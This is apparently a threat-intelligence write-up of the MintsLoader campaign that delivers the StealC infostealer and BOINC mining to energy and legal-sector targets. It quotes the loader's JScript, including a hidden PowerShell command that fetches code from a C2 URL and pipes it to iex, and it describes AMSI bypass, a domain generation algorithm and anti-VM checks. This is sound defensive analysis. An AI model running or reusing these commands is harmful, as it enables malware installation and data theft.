MintsLoader Delivers StealC Malware and BOINC in Targeted Cyber Attacks
Overview
Recently, there has been an ongoing campaign using a malware loader called MintSloader to distribute malicious payloads like Stealc Information Stealer and Boinc.
According to the cybersecurity company Esentire, this campaign mainly targets electric, oil and gas companies, and legal services sectors in the United States and Europe.
Key Findings
MintsLoader is a malware loader used to spread and deploy other malware on victims' computers. According to recorded reports, it is often distributed through:
Fake websites or pirated software
Phishing emails
Malvertising
The MintsLoader infection process begins when a victim clicks a link in a spam email that downloads a JScript file matching the regex pattern, Fattura [0-9]{8}.js.
StealC is a type of information-stealing malware, designed to collect sensitive data from infected devices. It mainly targets web browsers and popular applications to steal:
Login information (username, password)
Browser cookies (to maintain session even if the password is changed)
Autofill data like credit card numbers, addresses
Cryptocurrency wallets and bank account information
Clipboard data (which may contain passwords or authentication codes)
BOINC is not malware, but in some cases, hackers can misuse this platform to mine cryptocurrency or perform unauthorized computations using other people's computers.
The content of the JScript file has been recorded.
How attackers carry out the campaign
Initially, the attacker will trick the victim into downloading an infected file from an unclear source, such as through email or a strange website. In this campaign, the file
“Fattura[0-9]{8}.js“was downloaded onto the victim's machine.The attacker will use a malicious Powershell script related to Windows Script Host (WSH), which can be used to download and execute malware from a web address, then delete itself from the victim's system.
2.1
Wscript.Sleep(13000);:- This command makes the script pause for 13 seconds. This can be used to delay the execution of the rest of the code, possibly to avoid detection by security software or to create the necessary time for preparation before executing the malicious code.
2.2var shell = WScript.CreateObject ("Wscript.Shell");:
- This code creates a WScript.Shell object, which allows the script to execute system commands, such as running programs or executing code.
2.3 shell.Run("powershell -noprofile —executionpolicy bypass -WindowStyle hidden -c \"curl -useb *http://mubuzb3vwv [.]top/1.php?s=nints13' | iex\"");:
shell.Run(): This command is used to run a command in the system environment. The command asks PowerShell to execute a command.powershell -noprofile —executionpolicy bypass: This is a way to run PowerShell without loading the user profile and bypassing the execution policy to allow the execution of malicious code.-WindowStyle hidden: Execute PowerShell in hidden mode, not showing the PowerShell window to the user.curl -usebhttp://mubuzb3vwv.top/1.php?s=nints13| iex:curl: Used to download content from a URL.URL
http://mubuzb3vwv.top/1.php?s=nints13: This is a web address where the malware will be downloaded. After downloading, the malware is piped (|) intoiex(an alias forInvoke-Expressionin PowerShell), causing the malware from this website to execute on the system.
2.4 var filesystemobj = WScript.CreateObject("Scripting.FileSystemobject");:
- This code creates a FileSystemObject, allowing the script to interact with the file system, such as creating, deleting, or copying files.
2.5 filesystemobj.DeleteFile(WScript.ScriptFullName);:
- This command deletes the current script file (the file where the code is running).
WScript.ScriptFullNamereturns the full path of the current script file, so when this code is executed, the script deletes itself from the system.
The next step involves running a PowerShell script to:
Download and execute malware from a command and control (C2) server.
Install StealC Malware or BOINC mining software to steal information or exploit system resources.
Open a backdoor on the victim's machine, allowing hackers to access the system remotely.
Avoid detection by obfuscating PowerShell commands to evade security software.
The attacker performs checks on the victim's machine environment to see if it is a virtual machine by running a PowerShell script and using anti-analysis techniques (Anti-VM Detection).
After completing the checks on the victim's system, the attacker continues to execute PowerShell to create a random C2 (Command & Control) domain. This helps the malware communicate with the control server without being easily detected or blocked by cybersecurity measures.
Initially create a
$c2as an empty stringGenerate a random domain name from the alphabet
Append
.topto create the C2 domain name
The next step in this campaign involves the attackers executing a malicious script with the aim to:
Pause execution using
sleep()to avoid detection.Disable AMSI protection in Windows Defender.
Download the malicious executable file (
aa.exe) from a remote server (temp.sh).Run the executable file (
aa.exe) to infect the system.
After completing the execution of MintsLoader on the victim's machine, the attacker proceeds to deploy StealC Malware. It will start with a piece of C code to check the infected machine's environment before continuing execution. If the computer or user is invalid, the program will exit itself (
ExitProcess(0)) to avoid analysis.
Then StealC Malware continues to check to avoid infection in certain countries: Russia, Ukraine, Belarus, Kazakhstan, Uzbekistan. When it detects that the victim's machine is in one of these countries, the malware will automatically exit to avoid legal risks.
In addition to checking the computer name, user, and country, the attacker continues by checking the number of CPUs. If it finds the machine has fewer than 2 CPUs, the malware will exit itself (
ExitProcess(0)). Virtual machines usually have 1 CPU to save resources. Then a piece of C code is executed to check the victim's machine RAM size. If the machine has less than 1111 MB, the malware will exit itself.
After completing the checks, StealC can start stealing:
Usernames and passwords from browsers
Browser cookies (which can be used to hijack accounts)
Autofill data such as bank card information and addresses
Cryptocurrency wallets from crypto management software
Clipboard data (which may contain passwords or OTP codes)
\=> After collecting the data, StealC sends all the information to the hacker's server.
Immediately after, BOINC (Berkeley Open Infrastructure for Network Computing) will be deployed. Hackers exploit BOINC to use computer resources for purposes such as:
Cryptocurrency mining by using the victim's CPU/GPU without their knowledge.
Performing complex calculations for fake projects to gain profit.
IOC
iocs/MintsLoader/MintsLoader_Stealc_01_14_2025.txt at main · eSentire/iocs · GitHub
Recommendations
Do not download software from unknown sources, especially cracked software or pirated games.
Do not open suspicious emails or links, even if they appear to be from a legitimate organization.
Regularly update software and operating systems to avoid security vulnerabilities.
Check for hidden processes running on your system; if you see BOINC or unfamiliar software that you didn't install, investigate immediately.
Use strong antivirus software to detect malware loaders like MintsLoader.
Conclusion
The MintSloader campaign is reported to target organizations in the US/Europe, mainly distributed through spam emails containing links to JScript files or via clickfix/kongtuke. When combined with information stealers like Stealc, it poses a threat to the security and integrity of sensitive data.
MintsLoader is a dangerous tool that can be used to deploy StealC Malware (data theft) and BOINC (exploiting computer resources) without the victim's consent. If you suspect your system is infected, you should check and remove it immediately to prevent serious consequences.
